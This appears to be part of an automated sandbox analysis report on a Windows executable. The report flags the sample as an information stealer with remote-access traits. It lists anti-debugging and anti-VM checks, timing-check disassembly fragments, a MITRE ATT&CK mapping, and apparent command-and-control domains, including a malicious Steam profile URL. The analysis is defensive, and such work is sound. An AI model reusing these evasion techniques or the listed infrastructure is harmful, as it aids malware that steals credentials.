    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8282FE second address: 828325 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60EBh 0x00000007 jmp 00007EFF192B60F3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828325 second address: 82832B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82848A second address: 828496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007EFF192B60E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828496 second address: 8284A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8284A1 second address: 8284D0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFF192B60E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d jbe 00007EFF192B611Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007EFF192B60F8h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828636 second address: 828647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828790 second address: 828799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828CDE second address: 828D04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007EFF192480CCh 0x0000000f jmp 00007EFF192480C0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828D04 second address: 828D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 828FC1 second address: 82900A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480C7h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop eax 0x00000016 jmp 00007EFF192480C2h 0x0000001b pushad 0x0000001c push edi 0x0000001d pop edi 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 jc 00007EFF192480B6h 0x00000026 popad 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82BCE8 second address: 82BCEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82EEB2 second address: 82EECB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007EFF192480B6h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82EECB second address: 82EEE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60ECh 0x00000007 jl 00007EFF192B60E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82EEE4 second address: 82EEEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82EEEE second address: 82EF09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007EFF192B60EDh 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push esi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 830DDD second address: 830DE6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020BE3 second address: 5020C57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f jmp 00007EFF192B60EEh 0x00000014 test ecx, ecx 0x00000016 jmp 00007EFF192B60F0h 0x0000001b jns 00007EFF192B6135h 0x00000021 jmp 00007EFF192B60F0h 0x00000026 add eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007EFF192B60F7h 0x0000002f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020C57 second address: 5020C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF192480C4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020C6F second address: 5020C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5020C73 second address: 5020CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax+00000860h] 0x0000000e pushad 0x0000000f mov edi, 198B95A0h 0x00000014 pushfd 0x00000015 jmp 00007EFF192480C9h 0x0000001a and cx, 1CA6h 0x0000001f jmp 00007EFF192480C1h 0x00000024 popfd 0x00000025 popad 0x00000026 test eax, eax 0x00000028 pushad 0x00000029 mov edi, ecx 0x0000002b call 00007EFF192480C8h 0x00000030 mov ch, CCh 0x00000032 pop edx 0x00000033 popad 0x00000034 je 00007EFF89E1E13Bh 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007EFF192480C9h 0x00000041 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73CAD2 second address: 73CAD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040049 second address: 50400AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007EFF192480C7h 0x00000009 or ax, 26CEh 0x0000000e jmp 00007EFF192480C9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007EFF192480C0h 0x0000001a sub ch, 00000048h 0x0000001d jmp 00007EFF192480BBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50400AD second address: 50400C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50400C8 second address: 5040118 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007EFF192480BEh 0x00000010 mov edx, dword ptr [ebp+0Ch] 0x00000013 pushad 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007EFF192480BCh 0x0000001b sbb ah, 00000068h 0x0000001e jmp 00007EFF192480BBh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040118 second address: 5040121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040121 second address: 5040125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7330F4 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 757CA9 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7386A5 instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7BC9FD instructions caused by: Self-modifying code
    Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
    Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
    Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
    Source: C:\Users\user\Desktop\file.exe TID: 4444 Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Users\user\Desktop\file.exe Last function: Thread delayed
    Source: file.exe, file.exe, 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
    Source: Amcache.hve.4.dr Binary or memory string: VMware
    Source: Amcache.hve.4.dr Binary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.4.dr Binary or memory string: vmci.syshbin
    Source: Amcache.hve.4.dr Binary or memory string: VMware, Inc.
    Source: Amcache.hve.4.dr Binary or memory string: VMware20,1hbin@
    Source: Amcache.hve.4.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.4.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.4.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.00000000012C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: Amcache.hve.4.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.4.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: file.exe, 00000000.00000002.1951560374.000000000125E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
    Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.4.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.4.dr Binary or memory string: vmci.sys
    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
    Source: file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: file.exe, 00000000.00000002.1950788588.000000000070F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
    Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
    Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
    Source: C:\Users\user\Desktop\file.exe | File opened: SICE
    Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
    Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005700D0 LdrInitializeThunk,0_2_005700D0

    HIPS / PFW / Operating System Protection Evasion

    Source: file.exe | String found in binary or memory: clearancek.site
    Source: file.exe | String found in binary or memory: licendfilteo.site
    Source: file.exe | String found in binary or memory: spirittunek.stor
    Source: file.exe | String found in binary or memory: bathdoomgaz.stor
    Source: file.exe | String found in binary or memory: studennotediw.stor
    Source: file.exe | String found in binary or memory: dissapoiznw.stor
    Source: file.exe | String found in binary or memory: eaglepawnoy.stor
    Source: file.exe | String found in binary or memory: mobbipenju.stor
    Source: file.exe, file.exe, 00000000.00000002.1950916876.0000000000754000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: VProgram Manager
    Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
    Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.4.dr | Binary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    Techniques are listed per tactic column; a number in parentheses is the count shown next to that technique in the matrix.

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
    Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd; Scheduled Task
    Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
    Privilege Escalation: Process Injection (2); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
    Defense Evasion: Virtualization/Sandbox Evasion (24); Process Injection (2); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
    Discovery: Security Software Discovery (641); Virtualization/Sandbox Evasion (24); Process Discovery (2); System Information Discovery (223); Internet Connection Discovery; Wi-Fi Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
    Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
    Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
    Source | Detection | Scanner | Label
    file.exe | 100% | Avira | TR/Crypt.TPM.Gen
    file.exe | 100% | Joe Sandbox ML |
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label
    steamcommunity.com | 0% | Virustotal |
    sergei-esenin.com | 18% | Virustotal |
    studennotediw.store | 18% | Virustotal |
    bathdoomgaz.store | 22% | Virustotal |
    spirittunek.store | 22% | Virustotal |
    mobbipenju.store | 22% | Virustotal |
    clearancek.site | 18% | Virustotal |
    licendfilteo.site | 16% | Virustotal |
    dissapoiznw.store | 22% | Virustotal |
    eaglepawnoy.store | 19% | Virustotal |
    Source | Detection | Scanner | Label
    https://player.vimeo.com | 0% | URL Reputation | safe
    https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f | 0% | URL Reputation | safe
    https://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe
    https://www.gstatic.cn/recaptcha/ | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 0% | URL Reputation | safe
    http://www.valvesoftware.com/legal.htm | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | 0% | URL Reputation | safe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | 0% | URL Reputation | safe
    https://steam.tv/ | 0% | URL Reputation | safe
    https://steamcommunity.com/profiles/76561199724331900 | 100% | URL Reputation | malware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | 0% | URL Reputation | safe
    http://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe
    https://steamcommunity.com:443/profiles/76561199724331900 | 100% | URL Reputation | malware
    https://store.steampowered.com/points/shop/ | 0% | URL Reputation | safe
    https://lv.queniujq.cn | 0% | URL Reputation | safe
    https://steamcommunity.com/profiles/76561199724331900/inventory/ | 100% | URL Reputation | malware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 0% | URL Reputation | safe
    https://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am | 0% | URL Reputation | safe
    https://checkout.steampowered.com/ | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png | 0% | URL Reputation | safe
    https://avatars.akamai.steamstatic | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC | 0% | URL Reputation | safe
    https://store.steampowered.com/; | 0% | URL Reputation | safe
    https://store.steampowered.com/about/ | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english | 0% | URL Reputation | safe
    https://help.steampowered.com/en/ | 0% | URL Reputation | safe
    https://store.steampowered.com/news/ | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/ | 0% | URL Reputation | safe
    http://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1 | 0% | URL Reputation | safe
    https://recaptcha.net/recaptcha/; | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en | 0% | URL Reputation | safe
    https://store.steampowered.com/stats/ | 0% | URL Reputation | safe
    https://medal.tv | 0% | URL Reputation | safe
    https://broadcast.st.dl.eccdnx.com | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 0% | URL Reputation | safe
    https://store.steampowered.com/steam_refunds/ | 0% | URL Reputation | safe
    https://login.steampowered.com/ | 0% | URL Reputation | safe
    https://store.steampowered.com/legal/ | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl | 0% | URL Reputation | safe
    https://recaptcha.net | 0% | URL Reputation | safe
    http://upx.sf.net | 0% | URL Reputation | safe
    https://store.steampowered.com/ | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif | 0% | URL Reputation | safe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | 0% | URL Reputation | safe
    https://www.cloudflare.com/learning/access-management/phishing-attack/ | 0% | Virustotal |
    https://bathdoomgaz.store:443/api | 22% | Virustotal |
    https://steamcommunity.com/?subsection=broadcasts | 0% | Virustotal |
    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp | 0% | Virustotal |
    https://www.youtube.com | 0% | Virustotal |
    studennotediw.store | 18% | Virustotal |
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi | 0% | Virustotal |
    https://www.google.com | 0% | Virustotal |
    eaglepawnoy.store | 19% | Virustotal |
    https://sergei-esenin.com/ | 0% | Virustotal |
    https://licendfilteo.site:443/api | 20% | Virustotal |
    https://sketchfab.com | 0% | Virustotal |
    https://sergei-esenin.com:443/api | 19% | Virustotal |
    https://www.cloudflare.com/5xx-error-landing | 0% | Virustotal |
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a | 0% | Virustotal |
    dissapoiznw.store | 22% | Virustotal |
    https://www.google.com/recaptcha/ | 0% | Virustotal |
    https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ | 0% | Virustotal |
    https://steamcommunity.com/market/ | 0% | Virustotal |
    https://steamcommunity.com/my/wishlist/ | 0% | Virustotal |
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | 0% | Virustotal |
    https://steamcommunity.com/discussions/ | 0% | Virustotal |
    https://dissapoiznw.store:443/api | 22% | Virustotal |
    https://sergei-esenin.com/0 | 16% | Virustotal |
    bathdoomgaz.store | 22% | Virustotal |
    https://www.youtube.com/ | 0% | Virustotal |
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    steamcommunity.com | 104.102.49.254 | true | true | | unknown
    sergei-esenin.com | 104.21.53.8 | true | true | | unknown
    241.42.69.40.in-addr.arpa | unknown | unknown | false | | unknown
    eaglepawnoy.store | unknown | unknown | true | | unknown
    bathdoomgaz.store | unknown | unknown | true | | unknown
    spirittunek.store | unknown | unknown | true | | unknown
    licendfilteo.site | unknown | unknown | true | | unknown
    studennotediw.store | unknown | unknown | true | | unknown
    mobbipenju.store | unknown | unknown | true | | unknown
    clearancek.site | unknown | unknown | true | | unknown
    dissapoiznw.store | unknown | unknown | true | | unknown
    Name | Malicious | Antivirus Detection | Reputation
    studennotediw.store | true | | unknown
    dissapoiznw.store | true | | unknown
    https://steamcommunity.com/profiles/76561199724331900 | true | URL Reputation: malware | unknown
    eaglepawnoy.store | true | | unknown
    bathdoomgaz.store | true | | unknown
    clearancek.site | true | | unknown
    spirittunek.store | true | | unknown
    licendfilteo.site | true | | unknown
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://www.cloudflare.com/learning/access-management/phishing-attack/ | file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749627824.0000000001326000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
    https://player.vimeo.com | file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
